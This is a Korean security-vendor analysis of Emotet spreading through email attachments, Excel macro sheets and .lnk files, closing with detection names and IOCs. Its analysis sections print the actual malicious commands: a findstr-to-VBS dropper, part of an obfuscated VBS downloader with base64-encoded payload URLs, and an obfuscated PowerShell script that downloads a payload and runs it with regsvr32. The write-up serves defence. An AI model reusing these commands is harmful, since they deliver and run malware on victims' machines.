Posted By ASEC , 2022년 5월 12일

다양한 파일을 통해 유포 중인 Emotet 악성코드

ASEC 분석팀은 최근 Emotet 악성코드가 링크 파일(.lnk)을 통해 유포되고 있음을 확인하였다. Emotet 악성코드의 경우 과거부터 꾸준히 유포되고 있으며 지난 4월부터 Emotet 다운로더가 엑셀 파일 뿐만 아니라 링크 파일(.lnk)도 사용하는 것으로 확인되었다.

확보한 EML 파일들은 모두 사용자 메일에 대한 회신인 것처럼 속여 악성 코드를 유포하는 공통점이 존재한다.

[그림1] 메일에 첨부된 엑셀 파일의 경우 다음 블로그에서 공유한 매크로 시트를 활용한 유형과 동일한 방식을 사용한다.

다운로드 URL은 다음과 같다.

hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/

엑셀 파일 외 lnk 파일도 다수 발견되었으며 대부분 Invoice 관련 파일명으로 유포되고 있는 것으로 확인된다. 또한 유포 날짜에 따라 실행되는 명령어에 차이가 존재한다.

확인 날짜	유포 파일명
04/26	EXT Payment status.lnk
04/26	Past Due invoice.lnk
04/28	Electronic form.lnk
04/28	detalles_28042022.lnk
04/29	Address Changed.lnk
04/29	Change of Address.lnk
05/02	Payment with a new address.lnk
05/03	INF_15823367.lnk
05/03	MES_11845137690439733.lnk

표1. 확인된 lnk 파일명

Invoice # US-616121772.lnk

[그림2]의 메일에 첨부된 Invoice # US-616121772.lnk 파일의 경우 실행 시 다음 명령어를 수행한다.

cmd.exe /v:on /c findstr “glKmfOKnQLYKnNs.*” “Invoice # US-616121772.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

lnk 파일 하단에는 glKmfOKnQLYKnNs 문자열을 시작으로 하는 스크립트 코드가 존재하는데 lnk파일 실행 시 해당 코드를 %TEMP% 폴더의 YlScZcZKeP.vbs 파일로 저장 및 실행한다.

YlScZcZKeP.vbs 파일은 내부에 base64로 인코딩된 URL이 존재하며 해당 URL에 접속하여 추가 악성코드를 다운로드 및 실행한다.

glKmfOKnQLYKnNs=1::on error resume next:Set FSO = CreateObject(“Scripting.FileSystemObject”)::Function Base64Decode(ByVal vCode): With CreateObject(“Msxml2.DOMDocument.3.0”).CreateElement(“base64”): .dataType = “bin.base64”: .text = vCode: Base64Decode = Stream_BinaryToString(.nodeTypedValue): End With:End Function::Function Stream_BinaryToString(Binary): With CreateObject(“ADODB.Stream”): .Type = 1: .Open: .Write Binary: .Position = 0: .Type = 2: .CharSet = “utf-8”: Stream_BinaryToString = .ReadText: End With:End Function::Dim LmPxinnpsd(6):::LmPxinnpsd(0) = “aHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2Iv”::LmPxinnpsd(1) = “aHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIv”::LmPxinnpsd(2) = “aHR0cDovL2RlbW8zNC5ja2cuaGsvc2VydmljZS9oaE1acmZDN01ubTlKRC8=”::LmPxinnpsd(3) = “aHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2Lw==”::LmPxinnpsd(4) = “aHR0cDovL2NpcHJvLm14L3ByZW5zYS9zaVpQNjlyQkZtaWJEdnVUUDFMLw==”::LmPxinnpsd(5) = “aHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8=”:::Execute(“dIm xml,Ws”&chr(-7328+7372)&”Db,FiLePaTH,u”&chr(6281-6199)&”L:”&chr(872280/7269)&”ml = “”MSXml2.SeRVERXmlht”&chr(-4790+4874)&”p.3″&chr(7943-7897)&”0″”:Ws = “”wscRipT.SHEll””:D”&chr(3908-3810)&” = “”aDo”&chr(-4831+4931)&”b.”&chr(7496-7413)&”TReam””:seT ImSHdnYd”&chr(-9735+9821)&”R =”&chr(-6409+6441)
<생략>

VBS 코드 일부

다운로드 URL은 다음과 같다.

hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/

이후 다운로드 받은 파일을 %TEMP% 폴더에 KzcEXkekpr.Zvp 파일명으로 저장한 후 ‘%wInDiR% \sySTem32\regsVR32.Exe %tmp% \KZcEXkEkpR.ZVP’ 명령어를 통해 실행한다.

20220429_57092_005.lnk

[그림3 ]의 메일에 첨부된 20220429_57092_005.lnk 파일의 경우 앞서 설명한 lnk 파일과 달리 파워쉘 명령어를 사용하여 추가 파일을 다운로드한다. lnk 파일 실행 시 아래 파워쉘 명령어를 통해 Base64로 인코딩 된 데이터를 디코딩하여 % TEMP% 폴더에 xLhSBgzPSx.ps1 로 저장한다.

C:\Windows\system32\cmd.exe /v:on /c fHjk4fTLlkc5DZfyorHstui9FxCd6xw3JieZWhdwrpiX+F4gEcRJCp5i1KXfjUxLJXU8QzW5||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c “&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDo<중략>’)) > “%tmp%\xLhSBgzPSx.ps1”; powershell -executionpolicy bypass -file “$env:TEMP\xLhSBgzPSx.ps1”; Remove-Item -Force “$env:TEMP\xLhSBgzPSx.ps1″}”

실행 명령어 일부

$ProgressPreference="SilentlyContinue";$links=("hxxp://gccon.in/UploadedFiles/UYtJNrT2llxy1/","hxxp://gakudou.com/photo06/hEu/","hxxp://giasotti.com/js/Khc6mb0zx4KoWX/","hxxp://plresende.com/pcinfor/cq/","hxxp://thomasmanton.com/wp-includes/owZnpWmH4D8j/","hxxp://gla.ge/old/PuVaff/");foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/jnURxtRmiO.SKh;Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh;break} catch { }}

다운로드 URL은 다음과 같다.

hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/

이후 다운로드 받은 파일을 %TEMP% 폴더에 jnURxtRmiO.SKh 파일명으로 저장한 후 ‘Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh’ 명령어를 통해 실행한다.

앞서 설명한 다운로드 URL에서는 Emotet 악성코드가 다운로드 되는 것으로 확인된다. Emotet 악성코드는 실행 시 내부에 존재하는 다수의 C&C 서버 주소로 접속을 시도하며, 접속에 성공할 시 공격자로부터 명령을 받아 추가 악성코드 다운로드 등의 악성 행위를 수행할 수 있다.

최근 emotet 악성코드가 엑셀 문서 뿐만 아니라 다양한 다운로더를 통해 유포되고 있어 사용자의 주의가 필요하다.

현재 안랩 V3 제품은 해당 파일에 대해 다음과 같이 진단하고있다.

[파일 진단]
Downloader/XLS.Emotet
LNK/Autorun.Gen
Trojan/LNK.Runner
Trojan/Win.Agent.R488899

[IOC]
c32c22fa90ad51747e9939f8e7abf4c0
fd37d5fecf99b16df331be14649ac09c
6e1da3039639bb9d40fc9d5d355062c2
c43d185691aaba7d1d196156a4a450f7
hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/
hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/